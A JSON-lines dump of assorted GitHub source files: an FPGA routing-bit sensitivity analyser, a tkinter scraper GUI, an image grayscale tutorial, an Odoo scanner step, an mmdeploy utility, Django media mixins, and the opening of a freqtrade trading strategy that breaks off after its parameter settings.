{"seq_id":"14833000218","text":"import sys\n\n# Add the parent directory of this file (bfat root) to the interpreter's path\nsys.path.append(f'{\"/\".join(__file__.split(\"/\")[:-1])}/..')\n\nfrom bfat import get_tile_type_name\nfrom lib.tile import Tile\nfrom lib.file_processing import parse_tilegrid\nfrom lib.design_query import DesignQuery\nfrom lib.define_bit import bit_bitstream_addr\nfrom tqdm import tqdm\nfrom statistics import mean, stdev, median, quantiles\nimport pickle\n\n############################################\n#           Data Storage Classes           #\n############################################\n\nclass AnalyzedNet:\n    '''\n        Stores relevant information about the net and its sensitive bits\n        Arguments: string of the net's name, design query object\n\n        Attributes:\n            name - the net's name\n\n            pips - information about all used interconnect pips by the net\n                 - each pip is stored as a PipInfo object\n\n            num_bits - total number of configuration bits affecting the net's routing\n    '''\n\n    __slots__ = ('name', 'pips', 'num_bits')\n\n    def __init__(self, net_name:str, design:DesignQuery, tilegrid:dict):\n        '''\n            Constructor, finds all pips and sensitive bits related to the net and\n            populates class members with the retrieved information\n            Arguments: net_name, design query object, tilegrid information\n        '''\n\n        # Set some default values\n        self.name = net_name\n        self.pips = []\n        self.num_bits = 0\n\n        # Query design for pips of the net and verify the net exists and uses pips\n        net_pips = design.get_pips(self.name)\n        if self.name not in design.pips or design.pips[self.name] == []:\n            return\n\n        # Gather bit configuration information about each pip's routing mux\n        for pip in net_pips:\n            # Ignore non-INT pips\n            if any(['INT_L' not in wire and 'INT_R' not in wire for wire in pip]):\n                continue\n            \n            # Create PipInfo objects for storing configuration bit information\n            pip_info = PipInfo(pip, design, tilegrid)\n\n            # Verify that the object was created correctly\n            if hasattr(pip_info, 'pip_name'):\n                self.pips.append(pip_info)\n                self.num_bits += len(pip_info.row_bits) + 
len(pip_info.col_bits)\n\nclass PipInfo:\n '''\n Stores relevant information about a pip\n Arguments: part tilegrid information\n \n Attributes:\n pip_name - name of the pip, formatted to match Vivado\n\n mux_name - name of the routing mux\n\n mux_type - type of the routing mux (2-12, 2-18, 2-20, 5-16, 5-24)\n\n row_bits - list of the row bits for the routing mux\n\n col_bits - list of the column bits for the routing mux\n '''\n\n __slots__ = ('pip_name', 'mux_name', 'mux_type', 'row_bits', 'col_bits')\n\n def __init__(self, pip:tuple, design:DesignQuery, tilegrid:dict):\n '''\n Constructor, gathers all configuration bit information about the pip and its\n routing mux and stores it in member variables\n '''\n\n # Retrieve the tile name and the sink/source nodes of the pip, construct tile object\n tile, sink = pip[1].split('/')\n src = pip[0].split('/')[1]\n tile_type = get_tile_type_name(tile)\n tile_obj = Tile(tile, tile_type, design.part)\n\n # Verify that the pip sink is a switchbox routing mux in the tile\n if sink not in tile_obj.pips or src not in tile_obj.pips[sink]:\n return\n \n # Format relevant information and add to the member variables\n self.pip_name = f'{tile}/{tile_type}.{src}->>{sink}'\n self.mux_name = sink\n self.mux_type = tile_obj.resources[sink].mux_type\n\n # Get all configuration bits for the mux\n mux_config_bits = {'Row Bits' : tile_obj.resources[sink].row_bits,\n 'Column Bits' : tile_obj.resources[sink].col_bits}\n\n mux_conv_bits = {'Row Bits' : [], 'Column Bits' : []}\n # Convert each configuration bit to the full bittstream address format\n for bit_type, addresses in mux_config_bits.items():\n for addr in addresses:\n tile_addr = [tile, addr, 0]\n bitstream_addr = bit_bitstream_addr(tile_addr, tilegrid)\n mux_conv_bits[bit_type].append(bitstream_addr)\n\n # Populate object members with bit information\n self.row_bits = mux_conv_bits['Row Bits']\n self.col_bits = mux_conv_bits['Column Bits']\n\n############################################\n# Functions for dealing with .pickle files #\n############################################\n\ndef unserialize_structure(pickled_file:str):\n '''\n Unserializes a file containing the data from a previous run of this tool\n Arguments: string of the path to the pickled file\n Returns: list of analyzed nets\n '''\n\n # Open the file and unserialize the data\n with open(pickled_file, 'rb') as p_f:\n analyzed_nets = pickle.load(p_f)\n\n does_not_match = False\n # Check that the resulting data structure matches the expected format\n if not isinstance(analyzed_nets, list):\n does_not_match = True\n elif len(analyzed_nets) > 0 and not isinstance(analyzed_nets[0], AnalyzedNet):\n does_not_match = True\n\n # Throw exception if the data structure does not match\n if does_not_match:\n raise Exception('Input serialized data structure does not match expected format')\n\n return analyzed_nets\n\ndef serialize_structure(analyzed_nets:list, report_name:str):\n '''\n Serializes the final data structure and exports it to a file with\n a generated name\n Arguments: list of analyzed nets, string of report's filename\n Returns: Output .pickle file of the analysis\n '''\n\n # Change file extension to .pickle\n if len(report_name.split('.')) > 1:\n report_name = '.'.join(report_name.split('.')[:-1])\n outfile_name = report_name + '.pickle'\n\n # Open the file to write the data to\n with open(outfile_name, 'wb') as o_f:\n pickle.dump(analyzed_nets, o_f)\n\n############################################\n# Feature Flag Functions 
#\n############################################\n\ndef graph_output(nets:list):\n '''\n Plots a histogram showing the frequency at which different nets exhibit\n higher/lower numbers of used routing bits:\n Arguments: list of analyzed nets, string of the report's filename\n Returns: GUI of the plot\n '''\n\n import matplotlib.pyplot as plt\n\n N_BINS = 50\n\n # Extract the number of related bits from each net's object\n bit_freqs = [net.num_bits for net in nets]\n\n # Create the plot\n plt.hist(bit_freqs, density=False, bins=N_BINS)\n plt.title('Net Routing Sensitivity Analysis')\n plt.xlabel('Related bits per net')\n plt.ylabel('Frequency')\n plt.yscale('log')\n plt.show()\n\ndef remove_tmr_nets(nets:list, tmr_suffix:str):\n '''\n Filters out from a list of nets all triplicated nets\n Arguments: list of either AnalyzedNet objects or strings of net names\n Returns: list of non-triplicated AnalyzedNet objects or net names\n '''\n\n non_tmr_nets = []\n\n # Set of already checked net names (for efficiency)\n checked_nets = set()\n\n # Verify that the list of nets is either of AnalyzedNets or strings\n if all([isinstance(net_obj, AnalyzedNet) for net_obj in nets]):\n net_names = [net.name for net in nets]\n elif all([isinstance(net_obj, str) for net_obj in nets]):\n net_names = nets\n\n # Iterate through all nets in the list\n for net_obj in tqdm(nets):\n # If the given data structure is an AnalyzedNet object, use the name member\n if isinstance(net_obj, AnalyzedNet):\n net_name = net_obj.name\n elif isinstance(net_obj, str):\n net_name = net_obj\n\n # Skip net if it has already been checked\n if net_name in checked_nets:\n continue\n checked_nets.add(net_name)\n\n # Check if the TMR suffix is in the net name \n if tmr_suffix not in net_name:\n non_tmr_nets.append(net_obj)\n continue\n\n # Find the index of the TMR copy number in the string\n tmr_num_index = net_name.find(tmr_suffix) + 1 + len(tmr_suffix) # +1 is to account for '_'\n tmr_num = net_name[tmr_num_index]\n\n # Create list of TMR numbers to check\n tmr_nums_to_check = ['0', '1', '2']\n tmr_nums_to_check.remove(tmr_num)\n\n num_copies = 0\n # Check that two other copies of this net exist in the list of nets\n for curr_tmr_num in tmr_nums_to_check:\n # Create a copy of the net name with the changed TMR number\n net_copy = list(net_name)\n net_copy[int(tmr_num_index)] = curr_tmr_num\n net_copy = ''.join(net_copy)\n\n # Set flag if the copy exists\n if net_copy in net_names:\n num_copies += 1\n checked_nets.add(net_name)\n\n # This is a non-TMR net if less than 2 copies exist\n if num_copies < 2:\n non_tmr_nets.append(net_obj)\n \n return non_tmr_nets\n\n############################################\n# File I/O Helpers #\n############################################\n\ndef parse_nets_file(nets_file:str):\n '''\n Parses a text file containing all of the nets to analyze\n Arguments: String of the path to the nets file\n Returns: List containing all of the nets\n '''\n\n nets = []\n\n # Open the file and add the net on each line to the list\n with open(nets_file) as nets_f:\n for line in nets_f:\n net = line.strip()\n\n # Make sure the net is in the correct format\n if ' ' in net or '\\t' in net:\n raise Exception('File cannot include more than one net per line')\n\n nets.append(net)\n\n return nets\n\ndef get_outfile_name(outname_arg:str, nets_path:str, tmr_nets_ignored:bool):\n '''\n Generates a name for the output fault report file based on the arguments passed\n in by the user and net list file used\n Arguments: Strings of the file 
paths to the output file and the net list file,\n flag telling whether TMR nets were ignored or net\n Returns: String of the appropriate output file name\n '''\n\n outfile_name = ''\n\n # Return the user provided name if one was provided\n if outname_arg:\n outfile_name = outname_arg\n\n # If --all_nets flag was used (no nets file), generate entirely new file name\n elif not nets_path:\n # If TMR nets were ignored, note that in the output file name\n if tmr_nets_ignored:\n outfile_name = 'all_nonTMR_nets_analysis.txt'\n else:\n outfile_name = 'all_nets_analysis.txt'\n\n # Otherwise, generate name based on input nets file name\n else:\n # Obtain extensionless filename of the nets file\n nets_path = nets_path.strip().split('/')\n nets_file_name, _ = nets_path[-1].split('.')\n\n # If TMR nets were ignored, note that in the output file name\n if tmr_nets_ignored:\n outfile_name = f'{nets_file_name}_nonTMR_analysis.txt'\n else:\n outfile_name = f'{nets_file_name}_analysis.txt'\n\n return outfile_name\n\ndef print_analysis(analyzed_nets:list, outfile:str):\n '''\n Formats and prints the information about the nets' sensitive bits\n Arguments: analyzed nets list, string of output file path\n Returns: Output file (.txt) of the analysis\n '''\n \n # Open the output file to write to it\n with open(outfile, 'w') as o_f:\n # Write each net's information to the output file\n for net in analyzed_nets:\n o_f.write(f'{net.name}\\n')\n o_f.write(f'Pips: ({len(net.pips)})\\n')\n\n # Write each pip's sensitivity information to the file for the net\n for pip in net.pips:\n o_f.write(f'\\t{pip.pip_name} - {pip.mux_name} {pip.mux_type} Routing Mux:\\n')\n o_f.write(f'\\t\\tRow Bits: {pip.row_bits}\\n')\n o_f.write(f'\\t\\tColumn Bits: {pip.col_bits}\\n\\n')\n \n o_f.write(f'Total config bits: {net.num_bits}\\n')\n o_f.write('\\n-----------------------------------\\n\\n')\n\n # Extract the number of related bits from each net's object\n bit_freqs = [net.num_bits for net in analyzed_nets]\n\n # Gather some summary statistics about the data\n num_nets = len(bit_freqs)\n num_bits = sum(bit_freqs)\n bits_mean = mean(bit_freqs)\n bits_median = median(bit_freqs)\n \n # Standard deviation is only valid for data sets longer than one\n if num_nets > 1:\n bits_sd = stdev(bit_freqs)\n else:\n bits_sd = 'NA'\n\n # Deciles only valid for data sets larger than 10\n if num_nets > 10:\n bits_deciles = quantiles(bit_freqs, n=10)\n else:\n bits_deciles = 'NA'\n\n # Print the previously calculated summary statistics\n o_f.write('Summary Statistics:\\n')\n o_f.write(f'\\tNumber of Nets Analyzed: {num_nets}\\n')\n o_f.write(f'\\tNumber of Sensitive Bits: {num_bits}\\n')\n o_f.write(f'\\tMean of Bits Per Net: {bits_mean}\\n')\n o_f.write(f'\\tStdDev of Bits Per Net: {bits_sd}\\n')\n o_f.write(f'\\tMedian of Bits Per Net: {bits_median}\\n')\n o_f.write(f'\\tDeciles of Bits Per Net: {bits_deciles}')\n\n############################################\n# Main Function #\n############################################\n\ndef main(args):\n '''\n Main function: Writes a sensitivity report for all the nets given\n for a specific design with all related pips and routing bits\n '''\n\n # Unserialize data structure if flag is set\n if args.pickled_input:\n print('Unserializing data structure...')\n analyzed_nets = unserialize_structure(args.nets)\n\n # Remove all triplicated nets from the data structure if flag is set\n if args.non_tmr:\n print('Removing triplicated nets...')\n analyzed_nets[:] = remove_tmr_nets(analyzed_nets, args.non_tmr)\n\n # 
Standard net analysis flow\n else:\n print('Building design query...')\n\n # Create design query object\n if args.rapidwright:\n from lib.rpd_query import RpdQuery\n design = RpdQuery(args.dcp_file)\n else:\n from lib.design_query import VivadoQuery\n design = VivadoQuery(args.dcp_file)\n\n # Get part tilegrid information\n print('Parsing part tilegrid information from database...')\n tilegrid = parse_tilegrid(design.part)\n\n # Retrieve the nets to analyze\n print('Retrieving nets...')\n if args.all_nets:\n nets = design.get_all_nets()\n else:\n nets = parse_nets_file(args.nets)\n\n # Remove all triplicated nets from the list if flag is set\n if args.non_tmr:\n print('Removing triplicated nets...')\n nets[:] = remove_tmr_nets(nets, args.non_tmr)\n\n print('Analyzing nets...')\n analyzed_nets = []\n\n # Analyze all nets (retrieve all relevant pips, routing muxes, and configuration bits)\n for net in tqdm(nets):\n analyzed_net = AnalyzedNet(net, design, tilegrid)\n analyzed_nets.append(analyzed_net)\n\n # Get the output file name\n print('Generating output file...')\n outfile = get_outfile_name(args.out_file, args.nets, bool(args.non_tmr))\n\n # Print report of the found information\n print_analysis(analyzed_nets, outfile)\n\n # If the -p flag is set, serialize the analyzed_nets structure and write to a file\n if args.pickle:\n print('Serializing analysis data structure...')\n serialize_structure(analyzed_nets, outfile)\n\n # If the -g flag is set, graph a histogram of the data\n if args.graph:\n print('Generating histogram of the data...')\n graph_output(analyzed_nets)\n\n print('Done!')\n\nif __name__ == '__main__':\n import argparse\n # Create Argument Parser to take in command line arguments\n parser = argparse.ArgumentParser(description=\"Analyzes the given nets in a design and \"\n + \"reports all of the nets' sensitive bits\")\n # Input Files\n parser.add_argument('dcp_file', help='Vivado checkpoint file of the implemented design')\n parser.add_argument('nets', nargs='?',\n help='Text file containing the names of the net(s) to analyze')\n # Feature Flags\n parser.add_argument('-a', '--all_nets', action='store_true',\n help='Analyze the sensitivity of all nets in the design (this will take a while)')\n parser.add_argument('-rpd', '--rapidwright', action='store_true',\n help='Flag to use Rapidwright to read design data (unneeded if using --pickled_input')\n parser.add_argument('-g', '--graph', action='store_true',\n help='Plots a histogram of the frequency that the nets exhibit numbers of routing bits.')\n parser.add_argument('-p', '--pickle', action='store_true',\n help='Write the analysis data structure in a serialized format to a file')\n parser.add_argument('-pi', '--pickled_input', action='store_true',\n help='Input a pickled data structure containing the contents of a previous run of this tool '\n 'instead of a nets file')\n parser.add_argument('-ntmr', '--non_tmr', default='', help='Ignore all triplicated nets with the given TMR suffix')\n # Optional Output File Path\n parser.add_argument('-of', '--out_file', default='', help='File path where the output is to be written.')\n args = parser.parse_args()\n\n # Make sure a nets file is given if the \"all\" flag is not set\n if not args.nets and not args.all_nets:\n raise Exception('The nets argument is required unless the --all_nets flag is set')\n\n 
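# arguments validated above; run the full flow (design query, net filtering, analysis, report)\n    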
main(args)","repo_name":"byuccl/bfat","sub_path":"utils/net_analysis.py","file_name":"net_analysis.py","file_ext":"py","file_size_in_byte":18326,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"724751836","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python3\n\nimport tkinter as tk\nfrom scrape_01 import Scrape\n\n\nclass scraype_gui(Scrape):\n\n def __init__(self):\n super(scraype_gui, self).__init__(url=[''])\n\n def main(self):\n root = tk.Tk()\n text = tk.Text(root, height=10, width=40)\n text.pack(side=tk.LEFT, fill=tk.Y)\n scroll = tk.Scrollbar(root)\n scroll.pack(side=tk.RIGHT, fill=tk.Y)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n for i in super().get_link():\n text.insert(tk.END, i)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n gui = scraype_gui()\n gui.main()","repo_name":"Masarusan/untitled2","sub_path":"scraying/scrayper/scraype_gui/scrayper_gui.py","file_name":"scrayper_gui.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5306039774","text":"\n\n# For this tutorial series you only need python scipy and matplotlib to display image\nfrom scipy import misc\nimport numpy as np\n\n# 0. Read the image\nimage = misc.imread('lena.png')\n\n# 1. Get the image width, height, and dim of color image\nwidth_col,height_col,dim_col = image.shape\n\n# 2. Convert the image into gray scale\nimage_gray = misc.imread('lena.png')\n\n# 3. Operation of dot prodcut to get each channel's porportion\nimage_gray = np.dot(image_gray[...,:3],[0.299, 0.587, 0.114])\nwidth_gray,height_gray = image_gray.shape\n# Source: http://stackoverflow.com/questions/12201577/how-can-i-convert-an-rgb-image-into-grayscale-in-python\n\n# 4. Read the gray image directly \n# for more information - https://docs.scipy.org/doc/scipy-0.18.1/reference/generated/scipy.misc.imread.html\nimage_gray_dir = misc.imread('lena.png',mode=\"L\")\n\nimport matplotlib.pyplot as plt\n\n# 4. Display both images\n# plt.imshow(image_gray,cmap = plt.get_cmap('gray'))\n# plt.show() \n\n# Four axes, returned as a 2-d array\nf, axarr = plt.subplots(2, 2)\naxarr[0, 0].imshow(image)\naxarr[0, 0].set_title('Image Color')\n\naxarr[0, 1].imshow(image_gray,cmap = plt.get_cmap('gray'))\naxarr[0, 1].set_title('Image converted to Gray')\n\naxarr[1, 0].imshow(image_gray_dir,cmap = plt.get_cmap('gray'))\naxarr[1, 0].set_title('Image directly read to gray')\n\nplt.show() \n\n\n# Additional. 
Experiment on the operation\n# temp = np.array([[[1,2,3],[4,5,6],[7,8,9]],[[1,2,3],[4,5,6],[7,8,9]],[[1,2,3],[4,5,6],[7,8,9]] ])\n# print temp.shape\n# print temp[0,...,:3]","repo_name":"JaeDukSeo/Python_Basic_Image_Processing","sub_path":"2_Gray_Scale/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"74370325927","text":"# flake8: noqa\n# Use <m> or <message> to retrieve the data transmitted by the scanner.\n# Use <t> or <terminal> to retrieve the running terminal browse record.\n# Put the returned action code in <act>, as a single character.\n# Put the returned result or message in <res>, as a list of strings.\n# Put the returned value in <val>, as an integer\n\nterminal.write({'tmp_val5': ''})\nproduct = env['product.product'].browse(int(terminal.tmp_val2))\ninv_line = env['stock.inventory.line'].browse(int(terminal.tmp_val3))\n\nres = [\n _('Product: %s') % (product.display_name),\n ]\nif product.uom_id == env.ref('product.product_uom_unit'):\n qty_int = True\nelse:\n qty_int = False\n res.append(_('UNIT OF MEASURE: %s') % product.uom_id.name)\ntheoric_qty_display = qty_int and int(inv_line.theoretical_qty) or inv_line.theoretical_qty\nres.append(_('Theoric qty: %s') % theoric_qty_display)\ncur_qty_display = qty_int and int(inv_line.product_qty) or inv_line.product_qty\nres.append(_('QTY ALREADY INVENTORIED: %s') % cur_qty_display)\n\nact = 'C'\nres += [\n '',\n (_('Do you want to ADD to the already inventoried qty?')),\n '',\n (_('If you answer no, you will enter a new inventory qty.')),\n ]\n","repo_name":"akretion/stock-scanner-scenario","sub_path":"stock_scanner_inventory_generic/data/scanner_scenario_step_inventory_already_inventoried_option.py","file_name":"scanner_scenario_step_inventory_already_inventoried_option.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920920791","text":"from torch.utils.data import Dataset\n\n\ndef is_can_sort_dataset(dataset: Dataset) -> bool:\n \"\"\"Checking for the possibility of sorting the dataset by fields 'height'\n and 'width'.\n\n Args:\n dataset (Dataset): The dataset.\n\n Returns:\n bool: Is it possible or not to sort the dataset.\n \"\"\"\n is_sort_possible = \\\n hasattr(dataset, 'data_infos') and \\\n dataset.data_infos and \\\n all(key in dataset.data_infos[0] for key in ('height', 'width'))\n return is_sort_possible\n\n\ndef sort_dataset(dataset: Dataset) -> Dataset:\n \"\"\"Sorts the dataset by image height and width.\n\n Args:\n dataset (Dataset): The dataset.\n\n Returns:\n Dataset: Sorted dataset.\n \"\"\"\n sort_data_infos = sorted(\n dataset.data_infos, key=lambda e: (e['height'], e['width']))\n sort_img_ids = [e['id'] for e in sort_data_infos]\n dataset.data_infos = sort_data_infos\n dataset.img_ids = sort_img_ids\n return dataset\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"23144349817","text":"import os\n\nfrom django.db import models\n\nfrom moviepy import editor as mpy\nfrom django.conf import settings\n\nfrom django.core.validators import (\n MaxLengthValidator,\n MinLengthValidator,\n FileExtensionValidator\n)\nfrom safedelete import SOFT_DELETE_CASCADE\nfrom safedelete.models 
import SafeDeleteModel\n\nfrom painless.utils.upload.path import (\n date_directory_path\n)\n\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Sku_Mixin(models.Model):\n sku = models.CharField(\n max_length=255,\n editable=False,\n unique=True,\n )\n\n class Meta:\n abstract = True\n\n\nclass TitleSlugLinkModelMixin(models.Model):\n title = models.CharField(\n _(\"Title\"),\n max_length=150,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ],\n unique=True\n )\n slug = models.SlugField(\n _(\"Slug\"),\n editable=False,\n allow_unicode=True,\n max_length=150,\n unique=True\n )\n\n class Meta:\n abstract = True\n\n\nclass TimeStampModelMixin(models.Model):\n created = models.DateTimeField(\n _(\"Created\"),\n auto_now_add=True\n )\n modified = models.DateTimeField(\n _(\"Modified\"),\n auto_now=True\n )\n\n class Meta:\n abstract = True\n\n\nclass DeletedAtMixin(models.Model):\n deleted_at = models.DateTimeField(\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass SVGMixin(models.Model):\n svg = models.FileField(\n _(\"SVG\"),\n upload_to=date_directory_path,\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['svg', 'SVG'])]\n )\n\n svg_alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n\n class Meta:\n abstract = True\n\n\nclass WightSVGMixin(models.Model):\n wight_svg = models.FileField(\n _(\"Wight SVG\"),\n upload_to=date_directory_path,\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['svg', 'SVG'])]\n )\n\n wight_svg_alternate_text = models.CharField(\n _(\"Wight Svg Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n\n class Meta:\n abstract = True\n\n\nclass ImageMixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 'PNG', 'jpg', 'jpeg', 'png'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n @property\n def file_name(self):\n if self.picture:\n image_name = os.path.basename(\n '{}{}'.format(settings.BASE_DIR,\n self.picture.url.replace('/media', '/media/upload'))\n )\n return image_name\n else:\n return None\n\n @property\n def file_size(self):\n if self.picture:\n image = os.stat(\n '{}{}'.format(settings.BASE_DIR,\n self.picture.url.replace('/media', '/media/upload')))\n return image.st_size\n else:\n return 0\n\n\nclass ImageNullableMixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 'PNG', 'jpg', 'jpeg', 'png'])],\n null=True,\n blank=True\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ],\n null=True,\n blank=True\n )\n width_field = models.PositiveSmallIntegerField(\n 
_(\"Width Field\"),\n editable=False,\n null=True,\n blank=True\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False,\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass ImagePNG_Mixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['PNG', 'png'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass ImageJPG_Mixin(models.Model):\n picture = models.ImageField(\n _(\"Picture\"),\n upload_to=date_directory_path,\n height_field='height_field',\n width_field='width_field',\n max_length=110,\n validators=[FileExtensionValidator(allowed_extensions=['JPG', 'JPEG', 'jpg', 'jpeg'])]\n )\n\n alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass VideoMP4_Mixin(models.Model):\n video = models.FileField(\n _(\"Video\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['mp4', ])]\n )\n\n video_duration = models.FloatField(\n _(\"VideoDuration\"),\n default=0.0,\n blank=True,\n help_text=\"NOTE: seconds\"\n )\n\n class Meta:\n abstract = True\n\n @property\n def get_video_duration(self):\n if self.video:\n video = mpy.VideoFileClip(\n '{}{}'.format(settings.BASE_DIR,\n self.video.url.replace('/media', '/media/upload')))\n return video.duration\n else:\n return 0\n\n\nclass VideoNullableMP4_Mixin(models.Model):\n video = models.FileField(\n _(\"Video\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['mp4', ])],\n null=True, blank=True\n )\n\n video_duration = models.FloatField(\n _(\"VideoDuration\"),\n default=0.0,\n blank=True,\n help_text=\"NOTE: seconds\"\n )\n\n class Meta:\n abstract = True\n\n @property\n def get_video_duration(self):\n if self.video:\n video = mpy.VideoFileClip(\n '{}{}'.format(settings.BASE_DIR,\n self.video.url.replace('/media', '/media/upload')))\n return video.duration\n else:\n return 0\n\n\nclass PremiumMixin(models.Model):\n METHODS = (\n ('f', _('Freemium')),\n ('Z', _('Zarin')),\n )\n\n payment_method = models.CharField(\n _(\"Payment Method\"),\n choices=METHODS,\n max_length=1,\n default='f'\n )\n\n class Meta:\n abstract = True\n\n\nclass LevelMixin(models.Model):\n LEVELS = (\n ('b', _('Basic')),\n ('i', _('Intermediate')),\n ('a', _('Advance')),\n ('p', _('Professional')),\n )\n\n level = models.CharField(\n _(\"Level\"),\n choices=LEVELS,\n max_length=1,\n default='b'\n )\n\n class Meta:\n abstract = True\n\n\nclass CoverMixin(models.Model):\n cover = models.ImageField(\n _(\"Cover\"),\n upload_to=date_directory_path,\n height_field='cover_height_field',\n width_field='cover_width_field',\n max_length=110,\n validators=[FileExtensionValidator(\n allowed_extensions=['JPG', 'JPEG', 
'PNG', 'jpg', 'jpeg', 'png'])]\n )\n\n cover_alternate_text = models.CharField(\n _(\"Alternate Text\"),\n max_length=110,\n validators=[\n MaxLengthValidator(150),\n MinLengthValidator(3)\n ]\n )\n cover_width_field = models.PositiveSmallIntegerField(\n _(\"Width Field\"),\n editable=False\n )\n cover_height_field = models.PositiveSmallIntegerField(\n _(\"Height Field\"),\n editable=False\n )\n\n class Meta:\n abstract = True\n\n\nclass PDFModelMixin(models.Model):\n pdf = models.FileField(\n _(\"Pdf File\"),\n upload_to=date_directory_path,\n validators=[FileExtensionValidator(allowed_extensions=['pdf', 'PDF'])],\n null=True,\n blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass SafeDeleteModelMixin(SafeDeleteModel):\n _safedelete_policy = SOFT_DELETE_CASCADE\n\n class Meta:\n abstract = True\n","repo_name":"mehran-rahmanzadeh/saqr-backend","sub_path":"painless/utils/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":9774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73896314408","text":"# --- Do not remove these libs ---\r\nfrom freqtrade.strategy.interface import IStrategy\r\nfrom typing import Dict, List\r\nfrom functools import reduce\r\nfrom pandas import DataFrame\r\n# --------------------------------\r\n\r\nimport talib.abstract as ta\r\nimport numpy as np\r\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\r\nimport datetime\r\nfrom technical.util import resample_to_interval, resampled_merge\r\nfrom datetime import datetime, timedelta\r\nfrom freqtrade.persistence import Trade\r\nfrom freqtrade.strategy import stoploss_from_open, merge_informative_pair, DecimalParameter, IntParameter, CategoricalParameter\r\nimport technical.indicators as ftt\r\n\r\n\r\n#Divergence variables\r\nrangeUpper = 60\r\nrangeLower = 5\r\n\r\n# Buy hyperspace params:\r\nbuy_params = {\r\n \"antipump_threshold\": 0.257,\r\n \"base_nb_candles_buy\": 14,\r\n \"ewo_high\": 2.327,\r\n \"ewo_high_2\": -2.327,\r\n \"ewo_low\": -20.988,\r\n \"low_offset\": 0.975,\r\n \"low_offset_2\": 0.955,\r\n \"rsi_buy\": 40,\r\n\r\n #SMAOffsetProtectOptV1\r\n \"base_nb_candles_buy2\": 16,\r\n \"ewo_high2\": 5.638,\r\n \"ewo_low2\": -19.993,\r\n \"low_offset2\": 0.978,\r\n \"rsi_buy2\": 61,\r\n}\r\n\r\n# Sell hyperspace params:\r\nsell_params = {\r\n \"base_nb_candles_sell\": 24,\r\n \"high_offset\": 0.991,\r\n \"high_offset_2\": 0.997,\r\n #SMAOffsetProtectOptV1\r\n \"base_nb_candles_sell2\": 49,\r\n \"high_offset2\": 1.006, \"cstp_bail_how\": \"roc\",\r\n #####\r\n \"cstp_bail_roc\": -0.032,\r\n \"cstp_bail_time\": 1108,\r\n \"cstp_bb_trailing_input\": \"bb_lowerband_neutral_inf\",\r\n \"cstp_threshold\": -0.036,\r\n \"cstp_trailing_max_stoploss\": 0.054,\r\n \"cstp_trailing_only_offset_is_reached\": 0.06,\r\n \"cstp_trailing_stop_profit_devider\": 2,\r\n \"droi_pullback\": True,\r\n \"droi_pullback_amount\": 0.03,\r\n \"droi_pullback_respect_table\": False,\r\n \"droi_trend_type\": \"any\",\r\n}\r\n\r\n\r\n\r\n\r\nclass custom(IStrategy):\r\n 